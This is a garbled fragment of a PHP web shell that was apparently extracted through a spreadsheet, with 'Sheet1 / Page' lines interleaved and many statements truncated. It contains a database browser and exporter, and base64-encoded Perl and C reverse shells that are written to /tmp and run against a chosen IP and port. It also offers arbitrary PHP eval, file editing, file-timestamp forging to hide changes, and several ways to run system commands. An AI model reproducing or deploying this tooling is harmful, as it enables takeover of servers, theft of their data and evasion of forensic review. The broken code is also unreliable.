p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
p('<td><b>'.$row['Field'].'</b><br />'.$row['Type'].'</td><td><textarea class="area" name="insertsql['.$row['Field'].']" style="width:500px;height:60px;overflow:auto;">'.$value.'</textarea></td></tr>');
}
if ($doing == 'insert') {
p('<tr class="'.bg().'"><td colspan="2"><input class="bt" type="submit" name="insert" value="Insert" /></td></tr>');
} else {
p('<tr class="'.bg().'"><td colspan="2"><input class="bt" type="submit" name="update" value="Update" /></td></tr>');
makehide('base64'
}
p('</table></form>');
} else {
$querys = @explode(';'
$_SESSION['sqlquery'] = $querys;
foreach($querys as $num=>$query) {
if ($query) {
p("<p><b>Query#{$num} : ".htmlspecialchars($query
switch(qy($query))
{
case 0:
p('<h2>Error : '.mysql_error().'</h2>');
break;
case 1:
Sheet1
Page 19
if (strtolower(substr($query
$allowedit = 1;
}
if ($getnumsql) {
$tatol = mysql_num_rows(q($getnumsql));
$multipage = multi($tatol
}
if (!$tablename) {
$sql_line = str_replace(array("\r"
preg_match_all("/from\s+`{0
$tablename = $matches[1][0];
}
$result = q($query);
p($multipage);
p('<table border="0" cellpadding="3" cellspacing="0">');
p('<tr class="head">');
if ($allowedit) p('<td>Action</td>');
$fieldnum = @mysql_num_fields($result);
for($i=0;$i<$fieldnum;$i++){
$name = @mysql_field_name($result
$type = @mysql_field_type($result
$len = @mysql_field_len($result
p("<td nowrap>$name<br><span>$type($len)</span></td>");
}
p('</tr>');
while($mn = @mysql_fetch_assoc($result)){
$thisbg = bg();
p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
$where = $tmp = $b1 = '';
foreach($mn as $key=>$inside){
if ($inside) {
$where .= $tmp.$key."='".addslashes($inside)."'";
$tmp = ' AND ';
}
$b1 .= '<td nowrap>'.html_clean($inside).' </td>';
}
$where = base64_encode($where);
if ($allowedit) p('<td nowrap><a href="javascript:editrecord(\'edit\'
p($b1);
p('</tr>');
unset($b1);
}
tbfoot();
p($multipage);
break;
case 2:
$ar = mysql_affected_rows();
p('<h2>affected rows : <b>'.$ar.'</b></h2>');
break;
}
}
}
}
} else {
$query = q("SHOW TABLE STATUS");
Sheet1
Page 20
$table_num = $table_rows = $data_size = 0;
$tabledb = array();
while($table = mysql_fetch_array($query)) {
$data_size = $data_size + $table['Data_length'];
$table_rows = $table_rows + $table['Rows'];
$table['Data_length'] = sizecount($table['Data_length']);
$table_num++;
$tabledb[] = $table;
}
$data_size = sizecount($data_size);
unset($table);
p('<table border="0" cellpadding="0" cellspacing="0">');
p('<form action="'.$self.'" method="POST">');
makehide('action'
p($dbform);
p('<tr class="head">');
p('<td width="2%" align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td>');
p('<td>Name</td>');
p('<td>Rows</td>');
p('<td>Data_length</td>');
p('<td>Create_time</td>');
p('<td>Update_time</td>');
if ($highver) {
p('<td>Engine</td>');
p('<td>Collation</td>');
}
p('</tr>');
foreach ($tabledb as $key => $table) {
$thisbg = bg();
p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
p('<td align="center" width="2%"><input type="checkbox" name="table[]" value="'.$table['Name'].'" /></td>');
p('<td><a href="javascript:settable(\''.$table['Name'].'\');">'.$table['Name'].'</a> [ <a href="javascript:settable(\''.$table['Name'].'\'
p('<td>'.$table['Rows'].'</td>');
p('<td>'.$table['Data_length'].'</td>');
p('<td>'.$table['Create_time'].'</td>');
p('<td>'.$table['Update_time'].'</td>');
if ($highver) {
p('<td>'.$table['Engine'].'</td>');
p('<td>'.$table['Collation'].'</td>');
}
p('</tr>');
}
p('<tr class='.bg().'>');
p('<td> </td>');
p('<td>Total tables: '.$table_num.'</td>');
p('<td>'.$table_rows.'</td>');
p('<td>'.$data_size.'</td>');
p('<td colspan="'.($highver ? 4 : 2).'"> </td>');
p('</tr>');
p("<tr class=\"".bg()."\"><td colspan=\"".($highver ? 8 : 6)."\"><input name=\"saveasfile\" value=\"1\" type=\"checkbox\" /> Save as file <input class=\"input\" name=\"path\" value=\"".SA_ROOT.$_SERVER['HTTP_HOST']."_MySQL.sql\" type=\"text\" size=\"60\" /> <input class=\"bt\" type=\"submit\" name=\"downrar\" value=\"Export selection table\" /></td></tr>");
makehide('doing'
formfoot();
p("</table>");
fr($query);
}
Sheet1
Page 21
}
}
tbfoot();
@mysql_close();
}//end sql backup
elseif ($action == 'backconnect') {
!$yourip && $yourip = $_SERVER['REMOTE_ADDR'];
!$yourport && $yourport = '12345';
$usedb = array('perl'=>'perl'
$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC".
"BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb".
"SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd".
"KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ".
"sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC".
"Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D".
"QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp".
"Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
if ($start && $yourip && $yourport && $use){
if ($use == 'perl') {
cf('/tmp/angel_bc'
$res = execute(which('perl')." /tmp/angel_bc $yourip $yourport &");
} else {
cf('/tmp/angel_bc.c'
$res = execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c');
@unlink('/tmp/angel_bc.c');
$res = execute("/tmp/angel_bc $yourip $yourport &");
}
m("Now script try connect to $yourip port $yourport ");
}
formhead(array('title'=>'Back Connect'));
makehide('action'
p('<p>');
p('Your IP:');
makeinput(array('name'=>'yourip'
p('Your Port:');
makeinput(array('name'=>'yourport'
p('Use:');
makeselect(array('name'=>'use'
makeinput(array('name'=>'start'
p('</p>');
formfoot();
}//end sql backup
elseif ($action == 'eval') {
Sheet1
Page 22
$phpcode = trim($phpcode);
if($phpcode){
if (!preg_match('#<\?#si'
$phpcode = "<?php\n\n{$phpcode}\n\n?>";
}
eval("?".">$phpcode<?");
}
formhead(array('title'=>'Eval PHP Code'));
makehide('action'
maketext(array('title'=>'PHP Code'
p('<p><a onclick="javascript:alert(\' target="_blank">Get plugins</a></p>');
formfooter();
}//end eval
elseif ($action == 'editfile') {
if(file_exists($opfile)) {
$fp=@fopen($opfile
$contents=@fread($fp
@fclose($fp);
$contents=htmlspecialchars($contents);
}
formhead(array('title'=>'Create / Edit File'));
makehide('action'
makehide('dir'
makeinput(array('title'=>'Current File (import new file name and new file)'
maketext(array('title'=>'File Content'
formfooter();
}//end editfile
elseif ($action == 'newtime') {
$opfilemtime = @filemtime($opfile);
//$time = strtotime("$year-$month-$day $hour:$minute:$second");
$cachemonth = array('January'=>1
formhead(array('title'=>'Clone file was last modified time'));
makehide('action'
makehide('dir'
makeinput(array('title'=>'Alter file'
makeinput(array('title'=>'Reference file (fullpath)'
formfooter();
formhead(array('title'=>'Set last modified'));
makehide('action'
makehide('dir'
makeinput(array('title'=>'Current file (fullpath)'
p('<p>Instead »');
p('year:');
makeinput(array('name'=>'year'
p('month:');
makeinput(array('name'=>'month'
p('day:');
makeinput(array('name'=>'day'
p('hour:');
makeinput(array('name'=>'hour'
p('minute:');
makeinput(array('name'=>'minute'
p('second:');
makeinput(array('name'=>'second'
Sheet1
Page 23
p('</p>');
formfooter();
}//end newtime
elseif ($action == 'shell') {
if (IS_WIN && IS_COM) {
if($program && $parameter) {
$shell= new COM('Shell.Application');
$a = $shell->ShellExecute($program
m('Program run has '.(!$a ? 'success' : 'fail'));
}
!$program && $program = 'c:\windows\system32\cmd.exe';
!$parameter && $parameter = '/c net start > '.SA_ROOT.'log.txt';
formhead(array('title'=>'Execute Program'));
makehide('action'
makeinput(array('title'=>'Program'
p('<p>');
makeinput(array('title'=>'Parameter'
makeinput(array('name'=>'submit'
p('</p>');
formfoot();
}
formhead(array('title'=>'Execute Command'));
makehide('action'
if (IS_WIN && IS_COM) {
$execfuncdb = array('phpfunc'=>'phpfunc'
makeselect(array('title'=>'Use:'
}
p('<p>');
makeinput(array('title'=>'Command'
makeinput(array('name'=>'submit'
p('</p>');
formfoot();
if ($command) {
p('<hr width="100%" noshade /><pre>');
if ($execfunc=='wscript' && IS_WIN && IS_COM) {
$wsh = new COM('WScript.shell');
$exec = $wsh->exec('cmd.exe /c '.$command);
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
} elseif ($execfunc=='proc_open' && IS_WIN && IS_COM) {
$descriptorspec = array(
0 => array('pipe'
1 => array('pipe'
2 => array('pipe'
);
$process = proc_open($_SERVER['COMSPEC']
if (is_resource($process)) {
fwrite($pipes[0]
Sheet1
Page 24
fwrite($pipes[0]
Sheet1
Page 25
} elseif(function_exists('shell_exec')) {
$res = @shell_exec($cfe);
} elseif(function_exists('system')) {
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(function_exists('passthru')) {
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(@is_resource($f = @popen($cfe
}
}
